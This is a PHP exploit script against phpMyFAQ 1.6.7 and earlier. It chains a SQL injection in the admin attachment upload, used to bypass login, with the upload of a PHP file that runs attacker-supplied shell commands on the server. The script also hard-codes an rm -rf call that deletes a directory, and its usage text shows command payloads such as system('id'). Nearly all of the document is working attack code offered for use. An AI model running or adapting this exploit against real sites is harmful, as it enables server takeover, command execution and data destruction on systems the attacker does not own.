phpMyFAQ <= 1.6.7 Remote SQL Injection / Command Execution Exploit

#!/usr/bin/php5-cgi&nbsp;-q <? /* Sql&nbsp;injection&nbsp;/&nbsp;remote&nbsp;command&nbsp;execution&nbsp;exploit&nbsp;for&nbsp;phpmyfaq&nbsp;<&nbsp;1.6.8 Bugtraq: http://www.securityfocus.com/bid/21944 CVS: http://thinkforge.org/plugins/scmcvs/cvsweb.php/phpmyfaq/admin/attachment.php.diff?r1=1.7.2.11.2.5;r2=1.7.2.11.2.6;cvsroot=phpmyfaq;f=h ./pmf.php&nbsp;http://xxxx.xxxx.edu/faq/&nbsp;\"<?&nbsp;system(\'id\');&nbsp;?>\"&nbsp;localhost:4001 elgCrew@safe-mail.net */ function&nbsp;do_upload($baseurl,&nbsp;$proxy,&nbsp;$cmd) { $fp&nbsp;=&nbsp;fopen(\"kebab.php\",&nbsp;\"w\"); if(!$fp) die(\"Cannot&nbsp;open&nbsp;file&nbsp;for&nbsp;writing\"); $code&nbsp;=&nbsp;\"Un1q\"&nbsp;.&nbsp;$cmd&nbsp;.&nbsp;\"<?&nbsp;system(\"rm&nbsp;-rf&nbsp;../1337/\");&nbsp;?>\"; fwrite($fp,&nbsp;$code); fclose($fp); $sendvars[\"aktion\"]&nbsp;=&nbsp;\"save\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sendvars[\"uin\"]&nbsp;=&nbsp;\"-1\'&nbsp;UNION&nbsp;SELECT&nbsp;char(0x61,0x64,0x6d,0x69,0x6e),char(0x61,0x61,0x27,0x20,0x4f,0x52,0x20,0x31,0x3d,0x31,0x20,0x2f,0x2a)&nbsp;/*\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sendvars[\"save\"]&nbsp;=&nbsp;\"TRUE\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sendvars[\"MAX_FILE_SIZE\"]&nbsp;=&nbsp;\"100000\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sendvars[\"id\"]&nbsp;=&nbsp;\"1337\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sendvars[\"userfile\"]&nbsp;=&nbsp;\'@kebab.php\'; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sendvars[\"filename\"]&nbsp;=&nbsp;\"kebab.php\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$posturl&nbsp;=&nbsp;$baseurl&nbsp;.&nbsp;\"/admin/attachment.php\"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$ch&nbsp;=&nbsp;curl_init(); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_URL,&nbsp;$posturl); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_PROXY,&nbsp;$proxy); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_POST,&nbsp;1); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;curl_setopt($ch,&nbsp;CURLOPT_POSTFIELDS,&nbsp;$sendvars); &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;echo&nbsp;\"=>&nbsp;Uploading&nbsp;file. \"; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$result&nbsp;=&nbsp;curl_exec($ch); curl_close($ch); @unlink(\"kebab.php\"); $get&nbsp;=&nbsp;&nbsp;$baseurl&nbsp;.&nbsp;\"/attachments/1337/kebab.php \"; $ch&nbsp;=&nbsp;curl_init(); curl_setopt($ch,&nbsp;CURLOPT_URL,&nbsp;$get); curl_setopt($ch,&nbsp;CURLOPT_PROXY,&nbsp;$proxy); curl_setopt($ch,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1); $result&nbsp;=&nbsp;curl_exec($ch); if(strstr($result,&nbsp;\"Un1q\")) echo&nbsp;substr($result,&nbsp;4); else echo&nbsp;\"Not&nbsp;vulnerable&nbsp;/&nbsp;error&nbsp;? \"; curl_close($ch); } if($argc&nbsp;<&nbsp;3) { printf(\"Usage:&nbsp;%s&nbsp;http://test.com/phpmyfaq/&nbsp;\"<?&nbsp;system(\'uname&nbsp;-a\');&nbsp;?>&nbsp;\"&nbsp;[proxy] \",&nbsp;$argv[0]); exit(0); } if($argc&nbsp;==&nbsp;4) $proxy&nbsp;=&nbsp;$argv[3]; else $proxy&nbsp;=&nbsp;\"\"; do_upload($argv[1],&nbsp;$proxy,&nbsp;$argv[2]); ?> &nbsp;